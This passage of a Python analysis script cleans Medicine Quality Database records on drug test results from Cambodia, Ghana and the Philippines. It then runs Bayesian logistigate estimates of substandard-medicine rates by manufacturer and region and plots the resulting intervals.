                   | (MQD_df_PHI.Manufacturer == 'Amherst Laboratories Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Amherst Laboratories, Inc.'),
                   'Manufacturer'] = 'Amherst'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Biotech Research Lab Inc.')
                   | (MQD_df_PHI.Manufacturer == 'BRLI'),
                   'Manufacturer'] = 'BRLI'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Compact Pharmaceutical Corp')
                   | (MQD_df_PHI.Manufacturer == 'Compact Pharmaceutical Corp.')
                   | (MQD_df_PHI.Manufacturer == 'Compact Pharmaceutical Corporation'),
                   'Manufacturer'] = 'Compact'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Diamond Laboratorie, Inc. ')
                   | (MQD_df_PHI.Manufacturer == 'Diamond Laboratories, Inc.'),
                   'Manufacturer'] = 'Diamond'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Drugmakers Biotech Research Laboratories, Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Drugmakers Laboratories Inc')
                   | (MQD_df_PHI.Manufacturer == 'Drugmakers Laboratories Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Drugmakers Laboratories, Inc.'),
                   'Manufacturer'] = 'Drugmakers'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Flamingo Pharmaceuticals Ltd')
                   | (MQD_df_PHI.Manufacturer == 'Flamingo Pharmaceuticals Ltd.')
                   | (MQD_df_PHI.Manufacturer == 'Flamingo Pharmaceuticals, Ltd.'),
                   'Manufacturer'] = 'Flamingo'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Interphil Laboratories')
                   | (MQD_df_PHI.Manufacturer == 'Interphil Laboratories, Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Interphil Laboratories,Inc'),
                   'Manufacturer'] = 'Interphil'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'J.M. Tolman Laboratories, Inc.')
                   | (MQD_df_PHI.Manufacturer == 'J.M. Tolmann Lab. Inc.')
                   | (MQD_df_PHI.Manufacturer == 'J.M. Tolmann Laboratories, Inc.')
                   | (MQD_df_PHI.Manufacturer == 'J.M.Tollman Laboratories Inc.')
                   | (MQD_df_PHI.Manufacturer == 'J.M.Tolmann Laboratories Inc')
                   | (MQD_df_PHI.Manufacturer == 'J.M.Tolmann Laboratories Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Tolmann'),
                   'Manufacturer'] = 'J.M. Tolmann'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Lloyd Laboratories Inc')
                   | (MQD_df_PHI.Manufacturer == 'Lloyd Laboratories Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Lloyd Laboratories, Inc.'),
                   'Manufacturer'] = 'Lloyd'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Lumar Pharmaceutical Lab')
                   | (MQD_df_PHI.Manufacturer == 'Lumar Pharmaceutical Lab. ')
                   | (MQD_df_PHI.Manufacturer == 'Lumar Pharmaceutical Laboratory'),
                   'Manufacturer'] = 'Lumar'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Lupin Limited') | (MQD_df_PHI.Manufacturer == 'Lupin Ltd')
                   | (MQD_df_PHI.Manufacturer == 'Lupin Ltd.'),
                   'Manufacturer'] = 'Lupin'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Missing') | (MQD_df_PHI.Manufacturer == 'No Information Available')
                   | (MQD_df_PHI.Manufacturer == 'No information'),
                   'Manufacturer'] = 'Unknown'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Natrapharm') | (MQD_df_PHI.Manufacturer == 'Natrapharm Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Natrapharm, Inc.'),
                   'Manufacturer'] = 'Natrapharm'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'New Myrex Lab., Inc.') | (MQD_df_PHI.Manufacturer == 'New Myrex Laboratories Inc')
                   | (MQD_df_PHI.Manufacturer == 'New Myrex Laboratories Inc.')
                   | (MQD_df_PHI.Manufacturer == 'New Myrex Laboratories, Inc.'),
                   'Manufacturer'] = 'New Myrex'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Novartis (Bangladesh)') | (MQD_df_PHI.Manufacturer == 'Novartis (Bangladesh) Ltd.')
                   | (MQD_df_PHI.Manufacturer == 'Novartis Bangladesh Ltd')
                   | (MQD_df_PHI.Manufacturer == 'Novartis Bangladesh Ltd.')
                   | (MQD_df_PHI.Manufacturer == 'Novartis'),
                   'Manufacturer'] = 'Novartis'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Pascual Lab. Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Pascual Laboratories, Inc.'),
                   'Manufacturer'] = 'Pascual'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Pharex Health Corp.')
                   | (MQD_df_PHI.Manufacturer == 'Pharex'),
                   'Manufacturer'] = 'Pharex'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Plethico Pharmaceutical Ltd.')
                   | (MQD_df_PHI.Manufacturer == 'Plethico Pharmaceuticals, Ltd.'),
                   'Manufacturer'] = 'Plethico'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'San Marino Lab., Corp.')
                   | (MQD_df_PHI.Manufacturer == 'San Marino Laboratories Corp'),
                   'Manufacturer'] = 'San Marino'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Sandoz South Africa Ltd.')
                   | (MQD_df_PHI.Manufacturer == 'Sandoz Private Ltd.')
                   | (MQD_df_PHI.Manufacturer == 'Sandoz Philippines Corp.')
                   | (MQD_df_PHI.Manufacturer == 'Sandoz GmbH')
                   | (MQD_df_PHI.Manufacturer == 'Sandoz'),
                   'Manufacturer'] = 'Sandoz'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phil., Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phils, Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phis., Inc.')
                   | (MQD_df_PHI.Manufacturer == 'Scheele Laboratories Phils, Inc.'),
                   'Manufacturer'] = 'Scheele'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'The Generics Pharmacy')
                   | (MQD_df_PHI.Manufacturer == 'The Generics Pharmacy Inc.')
                   | (MQD_df_PHI.Manufacturer == 'TGP'),
                   'Manufacturer'] = 'TGP'
    MQD_df_PHI.loc[(MQD_df_PHI.Manufacturer == 'Wyeth Pakistan Limited')
                   | (MQD_df_PHI.Manufacturer == 'Wyeth Pakistan Ltd')
                   | (MQD_df_PHI.Manufacturer == 'Wyeth Pakistan Ltd.'),
                   'Manufacturer'] = 'Wyeth'

    # Make smaller data frames filtered for facility type and therapeutic indication
    # Filter for facility type; only retail/clinic-style outlets are kept.
    MQD_df_CAM_filt = MQD_df_CAM[MQD_df_CAM['Facility Type'].isin(
        ['Depot of Pharmacy', 'Health Clinic', 'Pharmacy', 'Pharmacy Depot', 'Private Clinic',
         'Retail-drug Outlet', 'Retail drug outlet', 'Clinic'])].copy()
    MQD_df_GHA_filt = MQD_df_GHA[MQD_df_GHA['Facility Type'].isin(
        ['Health Clinic', 'Hospital', 'Pharmacy', 'Retail Shop', 'Retail-drug Outlet'])].copy()
    MQD_df_PHI_filt = MQD_df_PHI[MQD_df_PHI['Facility Type'].isin(
        ['Health Center', 'Health Clinic', 'Hospital', 'Hospital Pharmacy', 'Pharmacy',
         'Retail-drug Outlet', 'health office'])].copy()
    # Now filter by chosen drug types (applied on top of the facility filter).
    # NOTE(review): this reads a 'Therapeutic Indications' column, while the
    # docstring mentions 'Therapeutic Indication' — confirm against the CSV.
    MQD_df_CAM_antimalarial = MQD_df_CAM_filt[MQD_df_CAM_filt['Therapeutic Indications'].isin(['Antimalarial'])].copy()
    MQD_df_GHA_antimalarial = MQD_df_GHA_filt[MQD_df_GHA_filt['Therapeutic Indications'].isin(['Antimalarial',
                                                                                               'Antimalarials'])].copy()
    MQD_df_PHI_antituberculosis = MQD_df_PHI_filt[MQD_df_PHI_filt['Therapeutic Indications'].isin(['Anti-tuberculosis',
                                                                                                   'Antituberculosis'])].copy()

    # For each desired data set, generate lists suitable for use with logistigate:
    # rows of [Province, Manufacturer, 1 if 'Fail' else 0].
    # Overall data
    dataTbl_CAM = MQD_df_CAM[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
    dataTbl_CAM = [[i[0],i[1],1] if i[2]=='Fail' else [i[0],i[1],0] for i in dataTbl_CAM]
    dataTbl_GHA = MQD_df_GHA[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
    dataTbl_GHA = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_GHA]
    dataTbl_PHI = MQD_df_PHI[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
    dataTbl_PHI = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_PHI]
    # Filtered data
    dataTbl_CAM_filt = MQD_df_CAM_filt[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
    dataTbl_CAM_filt = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_CAM_filt]
    dataTbl_GHA_filt = MQD_df_GHA_filt[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
    dataTbl_GHA_filt = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_GHA_filt]
    dataTbl_PHI_filt = MQD_df_PHI_filt[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
    dataTbl_PHI_filt = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_PHI_filt]
    # Therapeutics data
    dataTbl_CAM_antimalarial = MQD_df_CAM_antimalarial[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
    dataTbl_CAM_antimalarial = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_CAM_antimalarial]
    dataTbl_GHA_antimalarial = MQD_df_GHA_antimalarial[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
    dataTbl_GHA_antimalarial = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_GHA_antimalarial]
    dataTbl_PHI_antituberculosis = MQD_df_PHI_antituberculosis[['Province', 'Manufacturer', 'Final Test Result']].values.tolist()
    dataTbl_PHI_antituberculosis = [[i[0], i[1], 1] if i[2] == 'Fail' else [i[0], i[1], 0] for i in dataTbl_PHI_antituberculosis]

    # Put the databases and lists into a dictionary
    outputDict = {}
    outputDict.update({'df_ALL':MQD_df,
                       'df_CAM':MQD_df_CAM, 'df_GHA':MQD_df_GHA, 'df_PHI':MQD_df_PHI,
                       'df_CAM_filt':MQD_df_CAM_filt, 'df_GHA_filt':MQD_df_GHA_filt, 'df_PHI_filt':MQD_df_PHI_filt,
                       'df_CAM_antimalarial':MQD_df_CAM_antimalarial, 'df_GHA_antimalarial':MQD_df_GHA_antimalarial,
                       'df_PHI_antituberculosis':MQD_df_PHI_antituberculosis,
                       'dataTbl_CAM':dataTbl_CAM, 'dataTbl_GHA':dataTbl_GHA, 'dataTbl_PHI':dataTbl_PHI,
                       'dataTbl_CAM_filt':dataTbl_CAM_filt, 'dataTbl_GHA_filt':dataTbl_GHA_filt,
                       'dataTbl_PHI_filt':dataTbl_PHI_filt, 'dataTbl_CAM_antimalarial':dataTbl_CAM_antimalarial,
                       'dataTbl_GHA_antimalarial':dataTbl_GHA_antimalarial,
                       'dataTbl_PHI_antituberculosis':dataTbl_PHI_antituberculosis})

    return outputDict
def MQDdataScript():
'''Script looking at the MQD data'''
import scipy.special as sps
import numpy as np
MCMCdict = {'MCMCtype': 'NUTS', 'Madapt': 5000, 'delta': 0.4}
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'exmples', 'data')))
# Grab processed data tables
dataDict = cleanMQD()
# Run with Country as outlets
dataTblDict = util.testresultsfiletotable('MQDfiles/MQD_TRIMMED1')
dataTblDict.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(0.038)),
'MCMCdict': MCMCdict})
logistigateDict = lg.runlogistigate(dataTblDict)
util.plotPostSamples(logistigateDict)
util.printEstimates(logistigateDict)
# Run with Country-Province as outlets
dataTblDict2 = util.testresultsfiletotable('MQDfiles/MQD_TRIMMED2.csv')
dataTblDict2.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(0.038)),
'MCMCdict': MCMCdict})
logistigateDict2 = lg.runlogistigate(dataTblDict2)
util.plotPostSamples(logistigateDict2)
util.printEstimates(logistigateDict2)
# Run with Cambodia provinces
dataTblDict_CAM = util.testresultsfiletotable(dataDict['dataTbl_CAM'], csvName=False)
countryMean = np.sum(dataTblDict_CAM['Y']) / np.sum(dataTblDict_CAM['N'])
dataTblDict_CAM.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM = lg.runlogistigate(dataTblDict_CAM)
numCamImps_fourth = int(np.floor(logistigateDict_CAM['importerNum'] / 4))
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth).tolist(),
subTitleStr=['\nCambodia - 1st Quarter', '\nCambodia'])
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth,numCamImps_fourth*2).tolist(),
subTitleStr=['\nCambodia - 2nd Quarter', '\nCambodia'])
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 2, numCamImps_fourth * 3).tolist(),
subTitleStr=['\nCambodia - 3rd Quarter', '\nCambodia'])
util.plotPostSamples(logistigateDict_CAM, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 3, numCamImps_fourth * 4).tolist(),
subTitleStr=['\nCambodia - 4th Quarter', '\nCambodia'])
util.printEstimates(logistigateDict_CAM)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_CAM['importerNum'] + logistigateDict_CAM['outletNum']
sampMedians = [np.median(logistigateDict_CAM['postSamples'][:,i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_CAM['importerNum']]) if x > 0.4]
util.plotPostSamples(logistigateDict_CAM, importerIndsSubset=highImporterInds,subTitleStr=['\nCambodia - Subset','\nCambodia'])
util.printEstimates(logistigateDict_CAM, importerIndsSubset=highImporterInds)
# Run with Cambodia provinces filtered for outlet-type samples
dataTblDict_CAM_filt = util.testresultsfiletotable(dataDict['dataTbl_CAM_filt'], csvName=False)
#dataTblDict_CAM_filt = util.testresultsfiletotable('MQDfiles/MQD_CAMBODIA_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_CAM_filt['Y']) / np.sum(dataTblDict_CAM_filt['N'])
dataTblDict_CAM_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM_filt = lg.runlogistigate(dataTblDict_CAM_filt)
numCamImps_fourth = int(np.floor(logistigateDict_CAM_filt['importerNum'] / 4))
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth).tolist(),
subTitleStr=['\nCambodia (filtered) - 1st Quarter', '\nCambodia (filtered)'])
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth, numCamImps_fourth * 2).tolist(),
subTitleStr=['\nCambodia (filtered) - 2nd Quarter', '\nCambodia (filtered)'])
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 2, numCamImps_fourth * 3).tolist(),
subTitleStr=['\nCambodia (filtered) - 3rd Quarter', '\nCambodia (filtered)'])
util.plotPostSamples(logistigateDict_CAM_filt, plotType='int90',
importerIndsSubset=np.arange(numCamImps_fourth * 3, logistigateDict_CAM_filt['importerNum']).tolist(),
subTitleStr=['\nCambodia (filtered) - 4th Quarter', '\nCambodia (filtered)'])
# Run with Cambodia provinces filtered for antibiotics
dataTblDict_CAM_antibiotic = util.testresultsfiletotable('MQDfiles/MQD_CAMBODIA_ANTIBIOTIC.csv')
countryMean = np.sum(dataTblDict_CAM_antibiotic['Y']) / np.sum(dataTblDict_CAM_antibiotic['N'])
dataTblDict_CAM_antibiotic.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM_antibiotic = lg.runlogistigate(dataTblDict_CAM_antibiotic)
numCamImps_third = int(np.floor(logistigateDict_CAM_antibiotic['importerNum'] / 3))
util.plotPostSamples(logistigateDict_CAM_antibiotic, plotType='int90',
importerIndsSubset=np.arange(numCamImps_third).tolist(),
subTitleStr=['\nCambodia - 1st Third (Antibiotics)', '\nCambodia (Antibiotics)'])
util.plotPostSamples(logistigateDict_CAM_antibiotic, plotType='int90',
importerIndsSubset=np.arange(numCamImps_third, numCamImps_third * 2).tolist(),
subTitleStr=['\nCambodia - 2nd Third (Antibiotics)', '\nCambodia (Antibiotics)'])
util.plotPostSamples(logistigateDict_CAM_antibiotic, plotType='int90',
importerIndsSubset=np.arange(numCamImps_third * 2, logistigateDict_CAM_antibiotic['importerNum']).tolist(),
subTitleStr=['\nCambodia - 3rd Third (Antibiotics)', '\nCambodia (Antibiotics)'])
util.printEstimates(logistigateDict_CAM_antibiotic)
# Run with Cambodia provinces filtered for antimalarials
dataTblDict_CAM_antimalarial = util.testresultsfiletotable(dataDict['dataTbl_CAM_antimalarial'], csvName=False)
countryMean = np.sum(dataTblDict_CAM_antimalarial['Y']) / np.sum(dataTblDict_CAM_antimalarial['N'])
dataTblDict_CAM_antimalarial.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_CAM_antimalarial = lg.runlogistigate(dataTblDict_CAM_antimalarial)
#numCamImps_half = int(np.floor(logistigateDict_CAM_antimalarial['importerNum'] / 2))
#util.plotPostSamples(logistigateDict_CAM_antimalarial, plotType='int90',
# importerIndsSubset=np.arange(numCamImps_half).tolist(),
# subTitleStr=['\nCambodia - 1st Half (Antimalarials)', '\nCambodia (Antimalarials)'])
#util.plotPostSamples(logistigateDict_CAM_antimalarial, plotType='int90',
# importerIndsSubset=np.arange(numCamImps_half,
# logistigateDict_CAM_antimalarial['importerNum']).tolist(),
# subTitleStr=['\nCambodia - 2nd Half (Antimalarials)', '\nCambodia (Antimalarials)'])
# Special plotting for these data sets
numImp, numOut = logistigateDict_CAM_antimalarial['importerNum'], logistigateDict_CAM_antimalarial['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_CAM_antimalarial['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_CAM_antimalarial['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, l], lowerQuant) for l in importerIndsSubset]
impUppers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, l], upperQuant) for l in importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nCambodia Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_CAM_antimalarial['outletNames'][i] for i in outletIndsSubset]
outLowers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, numImp + l], lowerQuant) for l in outletIndsSubset]
outUppers = [np.quantile(logistigateDict_CAM_antimalarial['postSamples'][:, numImp + l], upperQuant) for l in outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nCambodia Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_CAM_antimalarial)
# Run with Ethiopia provinces
dataTblDict_ETH = util.testresultsfiletotable('MQDfiles/MQD_ETHIOPIA.csv')
countryMean = np.sum(dataTblDict_ETH['Y']) / np.sum(dataTblDict_ETH['N'])
dataTblDict_ETH.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_ETH = lg.runlogistigate(dataTblDict_ETH)
util.plotPostSamples(logistigateDict_ETH)
util.printEstimates(logistigateDict_ETH)
# Run with Ghana provinces
dataTblDict_GHA = util.testresultsfiletotable(dataDict['dataTbl_GHA'], csvName=False)
#dataTblDict_GHA = util.testresultsfiletotable('MQDfiles/MQD_GHANA.csv')
countryMean = np.sum(dataTblDict_GHA['Y']) / np.sum(dataTblDict_GHA['N'])
dataTblDict_GHA.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA = lg.runlogistigate(dataTblDict_GHA)
util.plotPostSamples(logistigateDict_GHA, plotType='int90',
subTitleStr=['\nGhana', '\nGhana'])
util.printEstimates(logistigateDict_GHA)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_GHA['importerNum'] + logistigateDict_GHA['outletNum']
sampMedians = [np.median(logistigateDict_GHA['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_GHA['importerNum']]) if x > 0.4]
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_GHA['importerNum']:]) if x > 0.15]
util.plotPostSamples(logistigateDict_GHA, importerIndsSubset=highImporterInds,
outletIndsSubset=highOutletInds,
subTitleStr=['\nGhana - Subset', '\nGhana - Subset'])
util.printEstimates(logistigateDict_GHA, importerIndsSubset=highImporterInds,outletIndsSubset=highOutletInds)
# Run with Ghana provinces filtered for outlet-type samples
dataTblDict_GHA_filt = util.testresultsfiletotable(dataDict['dataTbl_GHA_filt'], csvName=False)
#dataTblDict_GHA_filt = util.testresultsfiletotable('MQDfiles/MQD_GHANA_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_GHA_filt['Y']) / np.sum(dataTblDict_GHA_filt['N'])
dataTblDict_GHA_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA_filt = lg.runlogistigate(dataTblDict_GHA_filt)
util.plotPostSamples(logistigateDict_GHA_filt, plotType='int90',
subTitleStr=['\nGhana (filtered)', '\nGhana (filtered)'])
util.printEstimates(logistigateDict_GHA_filt)
# Run with Ghana provinces filtered for antimalarials
dataTblDict_GHA_antimalarial = util.testresultsfiletotable(dataDict['dataTbl_GHA_antimalarial'], csvName=False)
#dataTblDict_GHA_antimalarial = util.testresultsfiletotable('MQDfiles/MQD_GHANA_ANTIMALARIAL.csv')
countryMean = np.sum(dataTblDict_GHA_antimalarial['Y']) / np.sum(dataTblDict_GHA_antimalarial['N'])
dataTblDict_GHA_antimalarial.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA_antimalarial = lg.runlogistigate(dataTblDict_GHA_antimalarial)
#util.plotPostSamples(logistigateDict_GHA_antimalarial, plotType='int90',
# subTitleStr=['\nGhana (Antimalarials)', '\nGhana (Antimalarials)'])
#util.printEstimates(logistigateDict_GHA_antimalarial)
# Special plotting for these data sets
numImp, numOut = logistigateDict_GHA_antimalarial['importerNum'], logistigateDict_GHA_antimalarial['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_GHA_antimalarial['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_GHA_antimalarial['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, l], lowerQuant) for l in
importerIndsSubset]
impUppers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, l], upperQuant) for l in
importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nGhana Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_GHA_antimalarial['outletNames'][i][6:] for i in outletIndsSubset]
outNames[7] = 'Western'
outLowers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, numImp + l], lowerQuant) for l in
outletIndsSubset]
outUppers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, numImp + l], upperQuant) for l in
outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nGhana Antimalarials',
